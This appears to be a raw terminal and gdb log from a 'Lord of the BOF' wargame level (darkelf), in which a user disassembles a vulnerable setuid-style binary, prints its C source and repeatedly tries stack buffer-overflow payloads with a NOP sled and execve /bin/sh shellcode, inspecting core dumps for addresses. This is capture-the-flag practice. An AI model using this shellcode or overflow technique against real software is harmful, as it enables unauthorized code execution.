0x804858f <main+143>:	add    %edx,47
0x8048592 <main+146>:	cmp    BYTE PTR [%edx],0xbf
0x8048595 <main+149>:	je     0x80485b0 <main+176>
0x8048597 <main+151>:	push   0x804867c
0x804859c <main+156>:	call   0x8048410 <printf>
0x80485a1 <main+161>:	add    %esp,4
0x80485a4 <main+164>:	push   0
0x80485a6 <main+166>:	call   0x8048420 <exit>
0x80485ab <main+171>:	add    %esp,4
0x80485ae <main+174>:	mov    %esi,%esi
0x80485b0 <main+176>:	mov    %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>:	add    %eax,4
0x80485b6 <main+182>:	mov    %edx,DWORD PTR [%eax]
0x80485b8 <main+184>:	push   %edx
0x80485b9 <main+185>:	call   0x80483f0 <strlen>
0x80485be <main+190>:	add    %esp,4
0x80485c1 <main+193>:	mov    %eax,%eax
0x80485c3 <main+195>:	cmp    %eax,48
0x80485c6 <main+198>:	jbe    0x80485e0 <main+224>
0x80485c8 <main+200>:	push   0x8048699
0x80485cd <main+205>:	call   0x8048410 <printf>
0x80485d2 <main+210>:	add    %esp,4
---Type <return> to continue, or q <return> to quit---
0x80485d5 <main+213>:	push   0
0x80485d7 <main+215>:	call   0x8048420 <exit>
0x80485dc <main+220>:	add    %esp,4
0x80485df <main+223>:	nop    
0x80485e0 <main+224>:	mov    %eax,DWORD PTR [%ebp+12]
0x80485e3 <main+227>:	add    %eax,4
0x80485e6 <main+230>:	mov    %edx,DWORD PTR [%eax]
0x80485e8 <main+232>:	push   %edx
0x80485e9 <main+233>:	lea    %eax,[%ebp-40]
0x80485ec <main+236>:	push   %eax
0x80485ed <main+237>:	call   0x8048440 <strcpy>
0x80485f2 <main+242>:	add    %esp,8
0x80485f5 <main+245>:	lea    %eax,[%ebp-40]
0x80485f8 <main+248>:	push   %eax
0x80485f9 <main+249>:	push   0x80486b0
0x80485fe <main+254>:	call   0x8048410 <printf>
0x8048603 <main+259>:	add    %esp,8
0x8048606 <main+262>:	push   40
0x8048608 <main+264>:	push   0
0x804860a <main+266>:	lea    %eax,[%ebp-40]
0x804860d <main+269>:	push   %eax
0x804860e <main+270>:	call   0x8048430 <memset>
0x8048613 <main+275>:	add    %esp,12
0x8048616 <main+278>:	leave  
0x8048617 <main+279>:	ret    
0x8048618 <main+280>:	nop    
0x8048619 <main+281>:	nop    
0x804861a <main+282>:	nop    
0x804861b <main+283>:	nop    
0x804861c <main+284>:	nop    
0x804861d <main+285>:	nop    
0x804861e <main+286>:	nop    
0x804861f <main+287>:	nop    
---Type <return> to continue, or q <return> to quit---
End of assembler dump.
(gdb) q
[wolfman@localhost wolfman]$ cat darkelf.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkelf 
        - egghunter + buffer hunter + check length of argv[1]
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	// egghunter 
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	// check the length of argument
	if(strlen(argv[1]) > 48){
		printf("argument is too long!\n");
		exit(0);
	}

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\xbf\xbf\xbf\xbf"+"\x00"+"\x90"*100'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./darkalf AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/64 $esp
0xbffffae0:	0x00000000	0xbffffb24	0xbffffb30	0x40013868
0xbffffaf0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffb00:	0x08048500	0x00000002	0xbffffb24	0x08048390
0xbffffb10:	0x0804864c	0x4000ae60	0xbffffb1c	0x40013e90
0xbffffb20:	0x00000002	0xbffffc1c	0xbffffc26	0x00000000
0xbffffb30:	0xbffffc57	0xbffffc69	0xbffffc81	0xbffffca0
0xbffffb40:	0xbffffcc2	0xbffffccf	0xbffffe92	0xbffffeb1
0xbffffb50:	0xbffffece	0xbffffee3	0xbfffff02	0xbfffff0d
0xbffffb60:	0xbfffff26	0xbfffff36	0xbfffff3e	0xbfffff48
0xbffffb70:	0xbfffff58	0xbfffff66	0xbfffff74	0xbfffff85
0xbffffb80:	0xbfffff90	0xbfffffa3	0xbfffffe6	0x00000000
0xbffffb90:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffba0:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffbb0:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffbc0:	0x00000009	0x08048450	0x0000000b	0x000001f9
0xbffffbd0:	0x0000000c	0x000001f9	0x0000000d	0x000001f9
(gdb) 
0xbffffbe0:	0x0000000e	0x000001f9	0x00000010	0x0fabfbff
0xbffffbf0:	0x0000000f	0xbffffc17	0x00000000	0x00000000
0xbffffc00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc10:	0x00000000	0x69000000	0x00363836	0x61642f2e
0xbffffc20:	0x6c616b72	0x41410066	0x41414141	0x41414141
0xbffffc30:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc40:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc50:	0xbfbf4141	0x0000bfbf	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) q
[wolfman@localhost wolfman]$ bash
[wolfman@localhost wolfman]$ f
bash: f: command not found
[wolfman@localhost wolfman]$ exit
exit
[wolfman@localhost wolfman]$ d
bash2: d: command not found
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\xbf\xbf\xbf\xbf"+"\x00"+"\x90"*100'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./darkalf AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) q 
[wolfman@localhost wolfman]$ gdb -c -q core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...

"/home/wolfman/core": not in executable format: File format not recognized


/home/wolfman/-q: No such file or directory.
(gdb) q
[wolfman@localhost wolfman]$ gdb -q -c core
Core was generated by `./darkalf AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/64 $esp
0xbffffae0:	0x00000000	0xbffffb24	0xbffffb30	0x40013868
0xbffffaf0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffb00:	0x08048500	0x00000002	0xbffffb24	0x08048390
0xbffffb10:	0x0804864c	0x4000ae60	0xbffffb1c	0x40013e90
0xbffffb20:	0x00000002	0xbffffc1c	0xbffffc26	0x00000000
0xbffffb30:	0xbffffc57	0xbffffc69	0xbffffc81	0xbffffca0
0xbffffb40:	0xbffffcc2	0xbffffccf	0xbffffe92	0xbffffeb1
0xbffffb50:	0xbffffece	0xbffffee3	0xbfffff02	0xbfffff0d
0xbffffb60:	0xbfffff26	0xbfffff36	0xbfffff3e	0xbfffff48
0xbffffb70:	0xbfffff58	0xbfffff66	0xbfffff74	0xbfffff85
0xbffffb80:	0xbfffff90	0xbfffffa3	0xbfffffe6	0x00000000
0xbffffb90:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffba0:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffbb0:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffbc0:	0x00000009	0x08048450	0x0000000b	0x000001f9
0xbffffbd0:	0x0000000c	0x000001f9	0x0000000d	0x000001f9
(gdb) x/64 $esp-64
0xbffffaa0:	0xbffffab0	0x00000000	0x00000028	0x00000017
0xbffffab0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffac0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffad0:	0x00000000	0x00000000	0x41414141	0xbfbfbfbf
0xbffffae0:	0x00000000	0xbffffb24	0xbffffb30	0x40013868
0xbffffaf0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffb00:	0x08048500	0x00000002	0xbffffb24	0x08048390
0xbffffb10:	0x0804864c	0x4000ae60	0xbffffb1c	0x40013e90
0xbffffb20:	0x00000002	0xbffffc1c	0xbffffc26	0x00000000
0xbffffb30:	0xbffffc57	0xbffffc69	0xbffffc81	0xbffffca0
0xbffffb40:	0xbffffcc2	0xbffffccf	0xbffffe92	0xbffffeb1
0xbffffb50:	0xbffffece	0xbffffee3	0xbfffff02	0xbfffff0d
0xbffffb60:	0xbfffff26	0xbfffff36	0xbfffff3e	0xbfffff48
0xbffffb70:	0xbfffff58	0xbfffff66	0xbfffff74	0xbfffff85
0xbffffb80:	0xbfffff90	0xbfffffa3	0xbfffffe6	0x00000000
0xbffffb90:	0x00000003	0x08048034	0x00000004	0x00000020
(gdb) 
0xbffffba0:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffbb0:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffbc0:	0x00000009	0x08048450	0x0000000b	0x000001f9
0xbffffbd0:	0x0000000c	0x000001f9	0x0000000d	0x000001f9
0xbffffbe0:	0x0000000e	0x000001f9	0x00000010	0x0fabfbff
0xbffffbf0:	0x0000000f	0xbffffc17	0x00000000	0x00000000
0xbffffc00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc10:	0x00000000	0x69000000	0x00363836	0x61642f2e
0xbffffc20:	0x6c616b72	0x41410066	0x41414141	0x41414141
0xbffffc30:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc40:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc50:	0xbfbf4141	0x0000bfbf	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) q
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\x90\xfc\xff\xbf"+"\x00"+"\x90"*100'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\x90\xfc\xff\xbf"+"\x00"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\x90\xfc\xff\xbf"+"\x00"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\x90\xfc\xff\xbf"+"\x41"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
argument is too long!
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\x90\xfc\xff\xbf"+"\x00"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\x90\xfc\xff\xbf"+"\x01"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
argument is too long!
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\x90\xfc\xff\xbf"+"\x00"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\x90\xfc\xff\xbf"+"\x00"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./darkalf AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Program terminated with signal 11, Segmentation fault.
#0  0xc0000063 in ?? ()
(gdb) x/64 $esp
0xbffffb00:	0x08048500	0x00000002	0xbffffb24	0x08048390
0xbffffb10:	0x0804864c	0x4000ae60	0xbffffb1c	0x40013e90
0xbffffb20:	0x00000002	0xbffffc1c	0xbffffc26	0x00000000
0xbffffb30:	0xbffffc57	0xbffffc69	0xbffffc81	0xbffffca0
0xbffffb40:	0xbffffcc2	0xbffffccf	0xbffffe92	0xbffffeb1
0xbffffb50:	0xbffffece	0xbffffee3	0xbfffff02	0xbfffff0d
0xbffffb60:	0xbfffff26	0xbfffff36	0xbfffff3e	0xbfffff48
0xbffffb70:	0xbfffff58	0xbfffff66	0xbfffff74	0xbfffff85
0xbffffb80:	0xbfffff90	0xbfffffa3	0xbfffffe6	0x00000000
0xbffffb90:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffba0:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffbb0:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffbc0:	0x00000009	0x08048450	0x0000000b	0x000001f9
0xbffffbd0:	0x0000000c	0x000001f9	0x0000000d	0x000001f9
0xbffffbe0:	0x0000000e	0x000001f9	0x00000010	0x0fabfbff
0xbffffbf0:	0x0000000f	0xbffffc17	0x00000000	0x00000000
(gdb) 
0xbffffc00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc10:	0x00000000	0x69000000	0x00363836	0x61642f2e
0xbffffc20:	0x6c616b72	0x41410066	0x41414141	0x41414141
0xbffffc30:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc40:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc50:	0xfc904141	0x0000bfff	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf0:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/64 $esp-100
0xbffffa9c:	0x08048613	0xbffffab0	0x00000000	0x00000028
0xbffffaac:	0x00000017	0x000000b0	0x00000000	0x00000000
0xbffffabc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffacc:	0x00000000	0x00000000	0x00000000	0x41414141
0xbffffadc:	0xbffffc90	0x00000000	0xbffffb24	0xbffffb30
0xbffffaec:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffffafc:	0x08048471	0x08048500	0x00000002	0xbffffb24
0xbffffb0c:	0x08048390	0x0804864c	0x4000ae60	0xbffffb1c
0xbffffb1c:	0x40013e90	0x00000002	0xbffffc1c	0xbffffc26
0xbffffb2c:	0x00000000	0xbffffc57	0xbffffc69	0xbffffc81
0xbffffb3c:	0xbffffca0	0xbffffcc2	0xbffffccf	0xbffffe92
0xbffffb4c:	0xbffffeb1	0xbffffece	0xbffffee3	0xbfffff02
0xbffffb5c:	0xbfffff0d	0xbfffff26	0xbfffff36	0xbfffff3e
0xbffffb6c:	0xbfffff48	0xbfffff58	0xbfffff66	0xbfffff74
0xbffffb7c:	0xbfffff85	0xbfffff90	0xbfffffa3	0xbfffffe6
0xbffffb8c:	0x00000000	0x00000003	0x08048034	0x00000004
(gdb) q
[wolfman@localhost wolfman]$ ./darkalf `python -c 'print"A"*44+"\xbf\xbf\xbf\xbf"+"\x00"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[wolfman@localhost wolfman]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./darkalf AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100x $esp-100
0xbffffa7c:	0x4005d920	0x400143e0	0xbffffa9c	0x40066070
0xbffffa8c:	0x40106980	0x4000ae60	0xbffffb24	0xbffffad8
0xbffffa9c:	0x08048613	0xbffffab0	0x00000000	0x00000028
0xbffffaac:	0x00000017	0x00000000	0x00000000	0x00000000
0xbffffabc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffacc:	0x00000000	0x00000000	0x00000000	0x41414141
0xbffffadc:	0xbfbfbfbf	0x00000000	0xbffffb24	0xbffffb30
0xbffffaec:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffffafc:	0x08048471	0x08048500	0x00000002	0xbffffb24
0xbffffb0c:	0x08048390	0x0804864c	0x4000ae60	0xbffffb1c
0xbffffb1c:	0x40013e90	0x00000002	0xbffffc1c	0xbffffc26
0xbffffb2c:	0x00000000	0xbffffc57	0xbffffc69	0xbffffc81
0xbffffb3c:	0xbffffca0	0xbffffcc2	0xbffffccf	0xbffffe92
0xbffffb4c:	0xbffffeb1	0xbffffece	0xbffffee3	0xbfffff02
0xbffffb5c:	0xbfffff0d	0xbfffff26	0xbfffff36	0xbfffff3e
0xbffffb6c:	0xbfffff48	0xbfffff58	0xbfffff66	0xbfffff74
0xbffffb7c:	0xbfffff85	0xbfffff90	0xbfffffa3	0xbfffffe6
0xbffffb8c:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffb9c:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffbac:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffbbc:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffbcc:	0x000001f9	0x0000000c	0x000001f9	0x0000000d
0xbffffbdc:	0x000001f9	0x0000000e	0x000001f9	0x00000010
0xbffffbec:	0x0fabfbff	0x0000000f	0xbffffc17	0x00000000
0xbffffbfc:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) q
[wolfman@localhost wolfman]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./darkalf AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100x $esp-100
0xbffffa7c:	0x4005d920	0x400143e0	0xbffffa9c	0x40066070
0xbffffa8c:	0x40106980	0x4000ae60	0xbffffb24	0xbffffad8
0xbffffa9c:	0x08048613	0xbffffab0	0x00000000	0x00000028
0xbffffaac:	0x00000017	0x00000000	0x00000000	0x00000000
0xbffffabc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffacc:	0x00000000	0x00000000	0x00000000	0x41414141
0xbffffadc:	0xbfbfbfbf	0x00000000	0xbffffb24	0xbffffb30
0xbffffaec:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffffafc:	0x08048471	0x08048500	0x00000002	0xbffffb24
0xbffffb0c:	0x08048390	0x0804864c	0x4000ae60	0xbffffb1c
0xbffffb1c:	0x40013e90	0x00000002	0xbffffc1c	0xbffffc26
0xbffffb2c:	0x00000000	0xbffffc57	0xbffffc69	0xbffffc81
0xbffffb3c:	0xbffffca0	0xbffffcc2	0xbffffccf	0xbffffe92
0xbffffb4c:	0xbffffeb1	0xbffffece	0xbffffee3	0xbfffff02
0xbffffb5c:	0xbfffff0d	0xbfffff26	0xbfffff36	0xbfffff3e
0xbffffb6c:	0xbfffff48	0xbfffff58	0xbfffff66	0xbfffff74
0xbffffb7c:	0xbfffff85	0xbfffff90	0xbfffffa3	0xbfffffe6
0xbffffb8c:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffb9c:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffbac:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffbbc:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffbcc:	0x000001f9	0x0000000c	0x000001f9	0x0000000d
0xbffffbdc:	0x000001f9	0x0000000e	0x000001f9	0x00000010
0xbffffbec:	0x0fabfbff	0x0000000f	0xbffffc17	0x00000000
0xbffffbfc:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/100b $esp-100
0xbffffa7c:	0x20	0xd9	0x05	0x40	0xe0	0x43	0x01	0x40
0xbffffa84:	0x9c	0xfa	0xff	0xbf	0x70	0x60	0x06	0x40
0xbffffa8c:	0x80	0x69	0x10	0x40	0x60	0xae	0x00	0x40
0xbffffa94:	0x24	0xfb	0xff	0xbf	0xd8	0xfa	0xff	0xbf
0xbffffa9c:	0x13	0x86	0x04	0x08	0xb0	0xfa	0xff	0xbf
0xbffffaa4:	0x00	0x00	0x00	0x00	0x28	0x00	0x00	0x00
0xbffffaac:	0x17	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffab4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffabc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffac4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffacc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffad4:	0x00	0x00	0x00	0x00	0x41	0x41	0x41	0x41
0xbffffadc:	0xbf	0xbf	0xbf	0xbf
(gdb) 
0xbffffae0:	0x00	0x00	0x00	0x00	0x24	0xfb	0xff	0xbf
0xbffffae8:	0x30	0xfb	0xff	0xbf	0x68	0x38	0x01	0x40
0xbffffaf0:	0x02	0x00	0x00	0x00	0x50	0x84	0x04	0x08
0xbffffaf8:	0x00	0x00	0x00	0x00	0x71	0x84	0x04	0x08
0xbffffb00:	0x00	0x85	0x04	0x08	0x02	0x00	0x00	0x00
0xbffffb08:	0x24	0xfb	0xff	0xbf	0x90	0x83	0x04	0x08
0xbffffb10:	0x4c	0x86	0x04	0x08	0x60	0xae	0x00	0x40
0xbffffb18:	0x1c	0xfb	0xff	0xbf	0x90	0x3e	0x01	0x40
0xbffffb20:	0x02	0x00	0x00	0x00	0x1c	0xfc	0xff	0xbf
0xbffffb28:	0x26	0xfc	0xff	0xbf	0x00	0x00	0x00	0x00
0xbffffb30:	0x57	0xfc	0xff	0xbf	0x69	0xfc	0xff	0xbf
0xbffffb38:	0x81	0xfc	0xff	0xbf	0xa0	0xfc	0xff	0xbf
0xbffffb40:	0xc2	0xfc	0xff	0xbf
(gdb) 
0xbffffb44:	0xcf	0xfc	0xff	0xbf	0x92	0xfe	0xff	0xbf
0xbffffb4c:	0xb1	0xfe	0xff	0xbf	0xce	0xfe	0xff	0xbf
0xbffffb54:	0xe3	0xfe	0xff	0xbf	0x02	0xff	0xff	0xbf
0xbffffb5c:	0x0d	0xff	0xff	0xbf	0x26	0xff	0xff	0xbf
0xbffffb64:	0x36	0xff	0xff	0xbf	0x3e	0xff	0xff	0xbf
0xbffffb6c:	0x48	0xff	0xff	0xbf	0x58	0xff	0xff	0xbf
0xbffffb74:	0x66	0xff	0xff	0xbf	0x74	0xff	0xff	0xbf
0xbffffb7c:	0x85	0xff	0xff	0xbf	0x90	0xff	0xff	0xbf
0xbffffb84:	0xa3	0xff	0xff	0xbf	0xe6	0xff	0xff	0xbf
0xbffffb8c:	0x00	0x00	0x00	0x00	0x03	0x00	0x00	0x00
0xbffffb94:	0x34	0x80	0x04	0x08	0x04	0x00	0x00	0x00
0xbffffb9c:	0x20	0x00	0x00	0x00	0x05	0x00	0x00	0x00
0xbffffba4:	0x06	0x00	0x00	0x00
(gdb) 
0xbffffba8:	0x06	0x00	0x00	0x00	0x00	0x10	0x00	0x00
0xbffffbb0:	0x07	0x00	0x00	0x00	0x00	0x00	0x00	0x40
0xbffffbb8:	0x08	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffbc0:	0x09	0x00	0x00	0x00	0x50	0x84	0x04	0x08
0xbffffbc8:	0x0b	0x00	0x00	0x00	0xf9	0x01	0x00	0x00
0xbffffbd0:	0x0c	0x00	0x00	0x00	0xf9	0x01	0x00	0x00
0xbffffbd8:	0x0d	0x00	0x00	0x00	0xf9	0x01	0x00	0x00
0xbffffbe0:	0x0e	0x00	0x00	0x00	0xf9	0x01	0x00	0x00
0xbffffbe8:	0x10	0x00	0x00	0x00	0xff	0xfb	0xab	0x0f
0xbffffbf0:	0x0f	0x00	0x00	0x00	0x17	0xfc	0xff	0xbf
0xbffffbf8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffc00:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffc08:	0x00	0x00	0x00	0x00
(gdb) 
0xbffffc0c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffc14:	0x00	0x00	0x00	0x69	0x36	0x38	0x36	0x00
0xbffffc1c:	0x2e	0x2f	0x64	0x61	0x72	0x6b	0x61	0x6c
0xbffffc24:	0x66	0x00	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffc2c:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffc34:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffc3c:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffc44:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffffc4c:	0x41	0x41	0x41	0x41	0x41	0x41	0xbf	0xbf
0xbffffc54:	0xbf	0xbf	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffc5c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbffffc64:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
